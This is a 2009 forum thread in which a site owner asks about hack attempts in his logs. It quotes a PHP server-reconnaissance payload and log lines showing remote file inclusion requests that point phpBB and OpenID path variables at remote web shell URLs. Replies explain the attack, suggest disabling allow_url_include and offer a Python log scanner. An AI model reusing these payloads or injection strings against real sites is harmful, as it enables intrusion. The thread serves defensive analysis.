#1 16 May 2009

Hi everyone, I just logged the following and I'm not quite sure how to interpret it:

Code:
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>

Code:
1||1242470918||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470920||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470927||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470927||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470928||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470928||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470929||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470929||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470930||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470930||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470930||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470932||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470946||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470946||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470948||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242470948||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242477034||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805
1||1242477034||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805
1||1242477035||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805
1||1242477035||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805

Can someone explain to me what is happening there?
#2 16 May 2009

Re: Hack attempts - log analysis

Someone loaded and executed a file via RFI (in the first case it was a web shell, in the second case the PHP file above). In the first case the variable "openid_root_path" was manipulated, in the second case "phpbb_root_path". The first script (cmd2.txt) is, as said, a web shell and can be used to execute commands. The second script (w.txt) "only" reads server information such as the Linux kernel version, server, server version, uptime, username etc. To render the attacks ineffective, set the variable allow_url_include in your php.ini to false. Oh, and the attacks were probably carried out by an automated hack bot (libwww-perl as user agent).
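As an added example (not code from this thread), here is a small Python scanner over the "||"-delimited log format from the first post that flags the RFI pattern described in the reply above: a query parameter whose value is a remote URL, plus the libwww-perl user agent. It assumes the six fields are flag, Unix timestamp, source IP, query string, an empty field and user agent, which the poster did not document; the third sample record is a constructed benign request.

```python
import re
from collections import Counter

# Two records copied from the first post plus one constructed benign request.
# Assumed layout: flag||unix_ts||source_ip||query_string||(empty)||user_agent
SAMPLE_LOG = """\
1||1242470918||218.150.79.146||openid_root_path=http://arl.lu/images/.thumbs/cmd2.txt?||||libwww-perl/5.805
1||1242477034||77.221.130.19||phpbb_root_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt??||||libwww-perl/5.805
1||1242477100||192.0.2.10||page=about&lang=de||||Mozilla/5.0 (constructed benign request)
"""

# A value starting with a URL scheme is the RFI signature (fetched and executed if allow_url_include=On).
REMOTE_SCHEME = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)

def parse_line(line):
    """Split one record into named fields; return None for malformed lines."""
    fields = line.rstrip('\n').split('||')
    if len(fields) < 6 or not fields[1].isdigit():
        return None
    return {'ts': int(fields[1]), 'ip': fields[2], 'query': fields[3], 'ua': fields[5]}

def rfi_params(query):
    """Return (name, value) pairs whose value points at a remote URL."""
    hits = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if REMOTE_SCHEME.match(value):
            hits.append((name, value))
    return hits

def scan(log_text):
    """Return the RFI findings and a per-source-IP counter of attempts."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = rfi_params(rec['query'])
        if not hits:
            continue
        per_ip[rec['ip']] += 1
        for name, value in hits:
            findings.append({'ts': rec['ts'], 'ip': rec['ip'], 'param': name,
                             'url': value.rstrip('?'),  # drop the trailing '?' the bots append
                             'bot_ua': rec['ua'].startswith('libwww-perl')})
    return findings, per_ip

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG)[0]:
        print(f"{f['ip']} set {f['param']} to {f['url']} (libwww-perl: {f['bot_ua']})")
```

Feed it a real log with the same layout and the per-IP counter gives you the repeat offenders to block; the findings list gives the remote hosts whose owners should be told they are serving the payloads.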
#3 17 May 2009

Re: Hack attempts - log analysis

Pyro, man, you really know your stuff. You can also see nicely that the "hacker^^" hosts his files on 2 different servers, one of which runs a Joomla CMS, where he also got in through a content hole. Also an Albanian ^^. Basically, if nothing has happened yet, don't worry; those guys almost always put up a "hacked by blah" to show who has the biggest one ^^. Since that's not the case, follow Pyro's advice and be happy ^^
#4 29 May 2009

Re: Hack attempts - log analysis

As Pyro already said, that's nothing special these days, and it was 100% a hack bot that tried to hack your site via known security holes. How it came to hack your site: Google + keywords, that's how many of these bots work... Here are some excerpts from my logs:
PS: some of the files being attacked there don't even exist on my server.